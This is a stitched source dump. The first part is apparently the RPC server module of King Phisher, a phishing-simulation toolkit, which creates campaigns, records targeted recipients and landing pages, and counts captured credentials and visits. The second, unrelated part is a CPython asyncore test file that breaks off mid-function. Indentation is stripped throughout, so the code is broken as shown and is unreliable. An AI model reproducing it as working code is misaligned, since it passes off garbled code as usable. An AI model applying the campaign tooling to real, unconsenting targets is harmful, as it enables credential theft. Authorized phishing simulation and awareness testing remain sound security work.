This method can be used to shut down the server. This function will
return; however, no subsequent requests will be processed.
.. warning::
This action will stop the server process and there is no
confirmation before it takes place.
"""
shutdown_thread = threading.Thread(target=handler.server.kp_shutdown)
shutdown_thread.start()
rpc_logger.debug("shutdown routine running in tid: 0x{0:x}".format(shutdown_thread.ident))
return
@register_rpc('/version', log_call=True)
def rpc_version(handler):
"""
Get the version information of the server. This returns a
dictionary with keys of version, version_info and rpc_api_version.
These values are provided for the client to determine
compatibility.
:return: A dictionary with version information.
:rtype: dict
"""
if not ipaddress.ip_address(handler.client_address[0]).is_loopback:
message = "an rpc request to /version was received from non-loopback IP address: {0}".format(handler.client_address[0])
rpc_logger.error(message)
raise errors.KingPhisherAPIError(message)
vinfo = {
'rpc_api_version': version.rpc_api_version,
'version': version.version,
'version_info': version.version_info._asdict()
}
return vinfo
@register_rpc('/config/get')
def rpc_config_get(handler, option_name):
"""
Retrieve a value from the server's configuration.
:param str option_name: The name of the configuration option.
:return: The option's value.
"""
if isinstance(option_name, (list, tuple)):
option_names = option_name
option_values = {}
for option_name in option_names:
if option_name not in CONFIG_READABLE:
raise errors.KingPhisherPermissionError('permission denied to read config option: ' + option_name)
if handler.config.has_option(option_name):
option_values[option_name] = handler.config.get(option_name)
return option_values
if option_name not in CONFIG_READABLE:
raise errors.KingPhisherPermissionError('permission denied to read config option: ' + option_name)
if handler.config.has_option(option_name):
return handler.config.get(option_name)
return
@register_rpc('/config/set')
def rpc_config_set(handler, options):
"""
Set options in the server's configuration. Any changes to the
server's configuration are not written to disk.
:param dict options: A dictionary of option names and values
"""
for option_name, option_value in options.items():
if option_name not in CONFIG_WRITEABLE:
raise errors.KingPhisherPermissionError('permission denied to write config option: ' + option_name)
handler.config.set(option_name, option_value)
return
@register_rpc('/campaign/new', database_access=True, log_call=True)
def rpc_campaign_new(handler, session, name, description=None):
"""
Create a new King Phisher campaign and initialize the database
information.
:param str name: The new campaign's name.
:param str description: The new campaign's description.
:return: The ID of the new campaign.
:rtype: int
"""
if session.query(db_models.Campaign).filter_by(name=name).count():
raise ValueError('the specified campaign name already exists')
campaign = db_models.Campaign(name=name, description=description, user_id=handler.rpc_session.user)
campaign.assert_session_has_permissions('c', handler.rpc_session)
session.add(campaign)
session.commit()
return campaign.id
@register_rpc('/campaign/alerts/is_subscribed', database_access=True, log_call=True)
def rpc_campaign_alerts_is_subscribed(handler, session, campaign_id):
"""
Check if the user is subscribed to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
:return: The alert subscription status.
:rtype: bool
"""
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=handler.rpc_session.user)
return query.count()
@register_rpc('/campaign/alerts/subscribe', database_access=True, log_call=True)
def rpc_campaign_alerts_subscribe(handler, session, campaign_id):
"""
Subscribe to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
"""
user_id = handler.rpc_session.user
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=user_id)
if query.count() == 0:
subscription = db_models.AlertSubscription(campaign_id=campaign_id, user_id=user_id)
subscription.assert_session_has_permissions('c', handler.rpc_session)
session.add(subscription)
session.commit()
@register_rpc('/campaign/alerts/unsubscribe', database_access=True, log_call=True)
def rpc_campaign_alerts_unsubscribe(handler, session, campaign_id):
"""
Unsubscribe from alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
"""
user_id = handler.rpc_session.user
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=user_id)
subscription = query.first()
if subscription:
subscription.assert_session_has_permissions('d', handler.rpc_session)
session.delete(subscription)
session.commit()
@register_rpc('/campaign/landing_page/new', database_access=True, log_call=True)
def rpc_campaign_landing_page_new(handler, session, campaign_id, hostname, page):
"""
Add a landing page for the specified campaign. Landing pages refer
to resources that when visited by a user should cause the visit
counter to be incremented.
:param int campaign_id: The ID of the campaign.
:param str hostname: The hostname which will be used to serve the request.
:param str page: The request resource.
"""
hostname = hostname.split(':', 1)[0]
page = page.lstrip('/')
query = session.query(db_models.LandingPage)
query = query.filter_by(campaign_id=campaign_id, hostname=hostname, page=page)
if query.count() == 0:
landing_page = db_models.LandingPage(campaign_id=campaign_id, hostname=hostname, page=page)
landing_page.assert_session_has_permissions('c', handler.rpc_session)
session.add(landing_page)
session.commit()
def _message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=None):
department = None
if department_name is not None:
department = session.query(db_models.CompanyDepartment).filter_by(name=department_name).first()
if department is None:
department = db_models.CompanyDepartment(name=department_name)
department.assert_session_has_permissions('c', handler.rpc_session)
session.add(department)
session.commit()
message = db_models.Message()
message.id = email_id
message.campaign_id = campaign_id
message.target_email = target_email
message.first_name = first_name
message.last_name = last_name
if department is not None:
message.company_department_id = department.id
return message
@register_rpc('/campaign/message/new', database_access=True, log_call=True)
def rpc_campaign_message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=None):
"""
Record a message that has been sent as part of a campaign. These details can
be retrieved later for value substitution in template pages.
:param int campaign_id: The ID of the campaign.
:param str email_id: The message id of the sent email.
:param str target_email: The email address that the message was sent to.
:param str first_name: The first name of the message's recipient.
:param str last_name: The last name of the message's recipient.
:param str department_name: The name of the company department that the message's recipient belongs to.
"""
message = _message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=department_name)
message.assert_session_has_permissions('c', handler.rpc_session)
session.add(message)
session.commit()
@register_rpc('/campaign/message/new/deferred', database_access=True, log_call=True)
def rpc_campaign_message_new_deferred(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=None):
"""
Record a message that is scheduled to be sent as part of a campaign but has not been sent yet. These details can
be retrieved later for value substitution in template pages.
:param int campaign_id: The ID of the campaign.
:param str email_id: The message id of the sent email.
:param str target_email: The email address that the message was sent to.
:param str first_name: The first name of the message's recipient.
:param str last_name: The last name of the message's recipient.
:param str department_name: The name of the company department that the message's recipient belongs to.
"""
message = _message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=department_name)
message.sent = db_models.sql_null()
message.assert_session_has_permissions('c', handler.rpc_session)
session.add(message)
session.commit()
@register_rpc('/campaign/stats', database_access=True, log_call=True)
def rpc_campaign_stats(handler, session, campaign_id):
"""
Generate statistics regarding the specified campaign and return them in a
dictionary. The dictionary will contain the keys credentials,
credentials-unique, messages, messages-trained, visits, visits-unique.
Values with unique in the key are counted unique by the message id for
which they are associated.
:param campaign_id: The unique ID of the campaign to generate statistics for.
:return: The statistics for the specified campaign.
:rtype: dict
"""
stats = {}
stats['credentials'] = session.query(db_models.Credential).filter_by(campaign_id=campaign_id).count()
stats['credentials-unique'] = session.query(db_models.Credential).filter_by(campaign_id=campaign_id).distinct(db_models.Credential.message_id).count()
stats['messages'] = session.query(db_models.Message).filter_by(campaign_id=campaign_id).count()
stats['messages-trained'] = session.query(db_models.Message).filter_by(campaign_id=campaign_id, trained=True).count()
stats['visits'] = session.query(db_models.Visit).filter_by(campaign_id=campaign_id).count()
stats['visits-unique'] = session.query(db_models.Visit).filter_by(campaign_id=campaign_id).distinct(db_models.Visit.message_id).count()
return stats
@register_rpc('/db/table/count', database_access=True)
def rpc_database_count_rows(handler, session, table_name, query_filter=None):
"""
Get a count of the rows in the specified table where the search
criteria matches.
:param str table_name: The name of the database table to query.
:param dict query_filter: A dictionary mapping optional search criteria for matching the query.
:return: The number of matching rows.
:rtype: int
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
query_filter = query_filter or {}
for column in query_filter.keys():
if column not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
query = session.query(metatable.model)
query = query.filter_by(**query_filter)
return query.count()
@register_rpc('/db/table/view', database_access=True)
def rpc_database_view_rows(handler, session, table_name, page=0, query_filter=None):
"""
Retrieve the rows from the specified table where the search
criteria matches.
:param str table_name: The name of the database table to query.
:param int page: The page number to retrieve results for.
:param dict query_filter: A dictionary mapping optional search criteria for matching the query.
:return: A dictionary with columns and rows keys.
:rtype: dict
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
query_filter = query_filter or {}
for column in query_filter.keys():
if column not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
offset = page * VIEW_ROW_COUNT
# it's critical that the columns are in the order that the client is expecting
rows = []
query = session.query(metatable.model)
query = query.filter_by(**query_filter)
total_rows = query.count()
for row in query[offset:]:
if len(rows) == VIEW_ROW_COUNT:
break
if row.session_has_permissions('r', handler.rpc_session):
rows.append([getattr(row, c) for c in metatable.column_names])
if not len(rows):
return None
return {'columns': metatable.column_names, 'rows': rows, 'total_rows': total_rows, 'page_size': VIEW_ROW_COUNT}
@register_rpc('/db/table/delete', database_access=True, log_call=True)
def rpc_database_delete_row_by_id(handler, session, table_name, row_id):
"""
Delete the row from the table with the specified value in the id column.
If the row does not exist, no error is raised.
:param str table_name: The name of the database table to delete a row from.
:param row_id: The id value.
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
row = db_manager.get_row_by_id(session, metatable.model, row_id)
if row is None:
logger = logging.getLogger('KingPhisher.Server.API.RPC')
logger.debug("received delete request for non existing row with id {0} from table {1}".format(row_id, table_name))
return
row.assert_session_has_permissions('d', handler.rpc_session)
session.delete(row)
session.commit()
@register_rpc('/db/table/delete/multi', database_access=True, log_call=True)
def rpc_database_delete_rows_by_id(handler, session, table_name, row_ids):
"""
Delete multiple rows from a table with the specified values in the id
column. If a row id specified in *row_ids* does not exist, then it will
be skipped and no error will be thrown.
:param str table_name: The name of the database table to delete rows from.
:param list row_ids: The row ids to delete.
:return: The row ids that were deleted.
:rtype: list
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
deleted_rows = []
for row_id in row_ids:
row = db_manager.get_row_by_id(session, metatable.model, row_id)
if not row:
continue
if not row.session_has_permissions('d', handler.rpc_session):
continue
session.delete(row)
deleted_rows.append(row_id)
session.commit()
return deleted_rows
@register_rpc('/db/table/get', database_access=True)
def rpc_database_get_row_by_id(handler, session, table_name, row_id):
"""
Retrieve a row from a given table with the specified value in the
id column.
:param str table_name: The name of the database table to retrieve a row from.
:param row_id: The id value.
:return: The specified row data.
:rtype: dict
"""
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
row = db_manager.get_row_by_id(session, metatable.model, row_id)
if row:
row.assert_session_has_permissions('r', handler.rpc_session)
row = dict(zip(metatable.column_names, (getattr(row, c) for c in metatable.column_names)))
elif metatable.model.is_private:
raise errors.KingPhisherPermissionError()
return row
@register_rpc('/db/table/insert', database_access=True)
def rpc_database_insert_row(handler, session, table_name, keys, values):
"""
Insert a new row into the specified table.
:param str table_name: The name of the database table to insert a new row into.
:param list keys: The column names of *values*.
:param list values: The values to be inserted in the row.
:return: The id of the new row that has been added.
"""
if not isinstance(keys, (list, tuple)):
keys = (keys,)
if not isinstance(values, (list, tuple)):
values = (values,)
if len(keys) != len(values):
raise errors.KingPhisherAPIError('the number of keys does not match the number of values')
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
for key in keys:
if key not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(key, table_name))
row = metatable.model()
for key, value in zip(keys, values):
setattr(row, key, value)
row.assert_session_has_permissions('c', handler.rpc_session)
session.add(row)
session.commit()
return row.id
@register_rpc('/db/table/insert/multi', database_access=True)
def rpc_database_insert_row_multi(handler, session, table_name, keys, rows, deconflict_ids=False):
"""
Insert multiple new rows into the specified table. If *deconflict_ids* is
true, new id values will be assigned as necessary to merge the data into
the database. This function will fail if constraints for the table are
not met.
:param str table_name: The name of the database table to insert data into.
:param list keys: The column names of the values in *rows*.
:param list rows: A list of rows, each row is a list of values ordered and identified by *keys* to be inserted.
:return: List of ids of the newly inserted rows.
:rtype: list
"""
inserted_rows = collections.deque()
if not isinstance(keys, list):
keys = list(keys)
if not isinstance(rows, list):
rows = list(rows)
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError('failed to get table object for: {0}'.format(table_name))
for key in keys:
if key not in metatable.column_names:
raise errors.KingPhisherAPIError('column {0} is invalid for table {1}'.format(key, table_name))
for row in rows:
if len(row) != len(keys):
raise errors.KingPhisherAPIError('row is not the same length as the number of values defined')
row = dict(zip(keys, row))
if 'id' in row and db_manager.get_row_by_id(session, metatable.model, row['id']) is not None:
if deconflict_ids:
row['id'] = None
else:
raise errors.KingPhisherAPIError('row id conflicts with an existing value')
table_row = metatable.model(**row)
table_row.assert_session_has_permissions('c', handler.rpc_session)
session.add(table_row)
inserted_rows.append(table_row)
session.commit()
return [row.id for row in inserted_rows]
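# Illustrative only (not part of the RPC API): the shape of *keys* and *rows*
# expected by rpc_database_insert_row_multi above, and how each row is folded
# into a column/value mapping, mirroring its dict(zip(...)) step. The table
# columns and values are hypothetical; the helper is never called.
def _example_insert_multi_payload():
    keys = ['campaign_id', 'hostname', 'page']
    rows = [
        [1, 'example.com', 'index.html'],
        [1, 'example.com', 'login.html'],
    ]
    return [dict(zip(keys, row)) for row in rows]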
@register_rpc('/db/table/set', database_access=True)
def rpc_database_set_row_value(handler, session, table_name, row_id, keys, values):
"""
Set values for a row in the specified table with an id of *row_id*.
:param str table_name: The name of the database table to set the values of the specified row.
:param tuple keys: The column names of *values*.
:param tuple values: The values to be updated in the row.
"""
if not isinstance(keys, (list, tuple)):
keys = (keys,)
if not isinstance(values, (list, tuple)):
values = (values,)
if len(keys) != len(values):
raise errors.KingPhisherAPIError('the number of keys does not match the number of values')
metatable = database_tables.get(table_name)
if not metatable:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
for key, value in zip(keys, values):
if key not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(key, table_name))
row = db_manager.get_row_by_id(session, metatable.model, row_id)
if not row:
raise errors.KingPhisherAPIError("failed to get row id: {0} from table: {1}".format(row_id, table_name))
row.assert_session_has_permissions('u', handler.rpc_session)
for key, value in zip(keys, values):
setattr(row, key, value)
row.assert_session_has_permissions('u', handler.rpc_session)
session.commit()
@register_rpc('/events/is_subscribed', log_call=True)
def rpc_events_is_subscribed(handler, event_id, event_type):
"""
Check if the client is currently subscribed to the specified server event.
:param str event_id: The identifier of the event to subscribe to.
:param str event_type: A sub-type for the corresponding event.
:return: Whether or not the client is subscribed to the event.
:rtype: bool
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
if not isinstance(event_type, str):
raise errors.KingPhisherAPIError('a valid event type must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
return event_socket.is_subscribed(event_id, event_type)
@register_rpc('/events/subscribe', log_call=True)
def rpc_events_subscribe(handler, event_id, event_types=None, attributes=None):
"""
Subscribe the client to the specified event published by the server.
When the event is published, the specified *attributes* of it and its
corresponding id and type information will be sent to the client.
:param str event_id: The identifier of the event to subscribe to.
:param list event_types: A list of sub-types for the corresponding event.
:param list attributes: A list of attributes of the event object to be sent to the client.
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
if not event_id.startswith('db-'):
# db-<table name> events are the only ones that are valid right now
raise errors.KingPhisherAPIError('invalid event_id: ' + event_id)
table_name = event_id[3:]
table_name = table_name.replace('-', '_')
metatable = database_tables.get(table_name)
if metatable is None:
raise errors.KingPhisherAPIError("invalid table object: {0}".format(table_name))
for event_type in event_types:
if event_type not in ('deleted', 'inserted', 'updated'):
raise errors.KingPhisherAPIError("event type {0} is invalid for db-* events".format(event_type))
for column in attributes:
if column not in metatable.column_names:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
return event_socket.subscribe(event_id, event_types=event_types, attributes=attributes)
@register_rpc('/events/unsubscribe', log_call=True)
def rpc_events_unsubscribe(handler, event_id, event_types=None, attributes=None):
"""
Unsubscribe from an event published by the server that the client
previously subscribed to.
:param str event_id: The identifier of the event to subscribe to.
:param list event_types: A list of sub-types for the corresponding event.
:param list attributes: A list of attributes of the event object to be sent to the client.
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
return event_socket.unsubscribe(event_id, event_types=event_types, attributes=attributes)
@register_rpc('/geoip/lookup', log_call=True)
def rpc_geoip_lookup(handler, ip, lang=None):
"""
Look up an IP address in the server's GeoIP database. If the IP address
can not be found in the database, None will be returned.
:param str ip: The IP address to look up.
:param str lang: The language to prefer for regional names.
:return: The geographic information for the specified IP address.
:rtype: dict
"""
try:
result = geoip.lookup(ip, lang=lang)
except geoip.AddressNotFoundError:
result = None
return result
@register_rpc('/geoip/lookup/multi', log_call=True)
def rpc_geoip_lookup_multi(handler, ips, lang=None):
"""
Look up multiple IP addresses in the server's GeoIP database. Each IP
address that can not be found in the database will have its result set
to None.
:param list ips: The list of IP addresses to look up.
:param str lang: The language to prefer for regional names.
:return: A dictionary containing the results keyed by the specified IP
addresses.
:rtype: dict
"""
results = {}
for ip in ips:
try:
result = geoip.lookup(ip, lang=lang)
except geoip.AddressNotFoundError:
result = None
results[ip] = result
return results
@register_rpc('/login', database_access=True)
def rpc_login(handler, session, username, password, otp=None):
logger = logging.getLogger('KingPhisher.Server.Authentication')
if not ipaddress.ip_address(handler.client_address[0]).is_loopback:
logger.warning("failed login request from {0} for user {1}, (invalid source address)".format(handler.client_address[0], username))
raise ValueError('invalid source address for login')
fail_default = (False, ConnectionErrorReason.ERROR_INVALID_CREDENTIALS, None)
fail_otp = (False, ConnectionErrorReason.ERROR_INVALID_OTP, None)
if not (username and password):
logger.warning("failed login request from {0} for user {1}, (missing username or password)".format(handler.client_address[0], username))
return fail_default
if not handler.server.forked_authenticator.authenticate(username, password):
logger.warning("failed login request from {0} for user {1}, (authentication failed)".format(handler.client_address[0], username))
return fail_default
user = session.query(db_models.User).filter_by(name=username).first()
if not user:
logger.info('creating new user object with name: ' + username)
user = db_models.User(name=username)
elif user.has_expired:
logger.warning("failed login request from {0} for user {1}, (user has expired)".format(handler.client_address[0], username))
return fail_default
elif user.otp_secret:
if otp is None:
logger.debug("failed login request from {0} for user {1}, (missing otp)".format(handler.client_address[0], username))
return fail_otp
if not (isinstance(otp, str) and len(otp) == 6 and otp.isdigit()):
logger.warning("failed login request from {0} for user {1}, (invalid otp)".format(handler.client_address[0], username))
return fail_otp
totp = pyotp.TOTP(user.otp_secret)
now = datetime.datetime.now()
if otp not in (totp.at(now + datetime.timedelta(seconds=offset)) for offset in (0, -30, 30)):
logger.warning("failed login request from {0} for user {1}, (invalid otp)".format(handler.client_address[0], username))
return fail_otp
user.last_login = db_models.current_timestamp()
session.add(user)
session.commit()
session_id = handler.server.session_manager.put(user.id)
logger.info("successful login request from {0} for user {1}".format(handler.client_address[0], username))
signals.send_safe('rpc-user-logged-in', logger, handler, session=session_id, name=username)
return True, ConnectionErrorReason.SUCCESS, session_id
@register_rpc('/logout', log_call=True)
def rpc_logout(handler):
rpc_session = handler.rpc_session
if rpc_session.event_socket is not None:
rpc_session.event_socket.close()
handler.server.session_manager.remove(handler.rpc_session_id)
logger = logging.getLogger('KingPhisher.Server.Authentication')
logger.info("successful logout request from {0} for user {1}".format(handler.client_address[0], rpc_session.user))
signals.send_safe('rpc-user-logged-out', logger, handler, session=handler.rpc_session_id, name=rpc_session.user)
@register_rpc('/plugins/list', log_call=True)
def rpc_plugins_list(handler):
"""
Return information regarding enabled plugins in the server.
:return: A dictionary representing enabled plugins and their meta-data.
:rtype: dict
"""
plugin_manager = handler.server.plugin_manager
plugins = {}
for _, plugin in plugin_manager:
plugins[plugin.name] = {
'description': plugin.description,
'name': plugin.name,
'title': plugin.title,
'version': plugin.version
}
return plugins
@register_rpc('/graphql', database_access=True)
def rpc_graphql(handler, session, query, query_vars=None):
"""
Execute a GraphQL query and return the results. If the query fails to
execute the errors returned are populated in the **errors** key of the
results dictionary. If the query executes successfully the returned data
is available in the **data** key of the results dictionary.
:param str query: The GraphQL query to execute.
:param dict query_vars: Any variables needed by the *query*.
:return: The results of the query as a dictionary.
:rtype: dict
"""
query_vars = query_vars or {}
result = graphql_schema.execute(
query,
context_value={
'plugin_manager': handler.server.plugin_manager,
'rpc_session': handler.rpc_session,
'session': session
},
variable_values=query_vars
)
errors = None
if result.errors:
errors = []
for error in result.errors:
if hasattr(error, 'message'):
errors.append(error.message)
elif hasattr(error, 'args') and error.args:
errors.append(str(error.args[0]))
else:
errors.append(repr(error))
return {'data': result.data, 'errors': errors}
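# --- Illustrative sketch (not part of the original module) ---
# graphql_schema.execute() below is the same call rpc_graphql() makes above;
# the query string is a hypothetical placeholder and the available fields
# depend on the King Phisher GraphQL schema. The helper is never called.
def _example_graphql_query(session, plugin_manager=None, rpc_session=None):
    query = '{ version }'  # hypothetical field; real fields depend on the schema
    result = graphql_schema.execute(
        query,
        context_value={
            'plugin_manager': plugin_manager,
            'rpc_session': rpc_session,
            'session': session
        },
        variable_values={}
    )
    if result.errors:
        return None
    return result.data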
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import threading
import sys
import time
from test import test_support
from test.test_support import TESTFN, run_unittest, unlink
from StringIO import StringIO
HOST = test_support.HOST
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
if hasattr(select, 'poll'):
def test_readwrite(self):
# Check that correct methods are called by readwrite()
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag in (select.POLLIN, select.POLLPRI):
tobj = testobj()
self.assertEqual(tobj.read, False)
asyncore.readwrite(tobj, flag)
self.assertEqual(tobj.read, True)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
tobj = testobj()
self.assertEqual(tobj.write, False)
asyncore.readwrite(tobj, select.POLLOUT)
self.assertEqual(tobj.write, True)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1,
select.POLLOUT)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.readwrite(tr2, select.POLLOUT)
self.assertEqual(tr2.error_handled, True)
for flag in (select.POLLERR, select.POLLHUP, select.POLLNVAL):
tobj = testobj()
self.assertEqual((tobj.expt, tobj.closed)[flag == select.POLLHUP], False)
asyncore.readwrite(tobj, flag)
self.assertEqual((tobj.expt, tobj.closed)[flag == select.POLLHUP], True)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEquals(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
if __debug__:
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
else:
expected = ['EGGS: %s' % l1, 'SPAM: %s' % l3]
self.assertEquals(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled exception',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEquals(lines, expected)
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_send(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
cap = StringIO()
args = (self.evt, cap, self.sock)
threading.Thread(target=capture_server, args=args).start()
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, self.port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
self.evt.wait()
self.assertEqual(cap.getvalue(), data*2)
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
if hasattr(asyncore, 'file_wrapper'):
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = "It's not dead, it's sleeping!"
file(TESTFN, 'w').write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
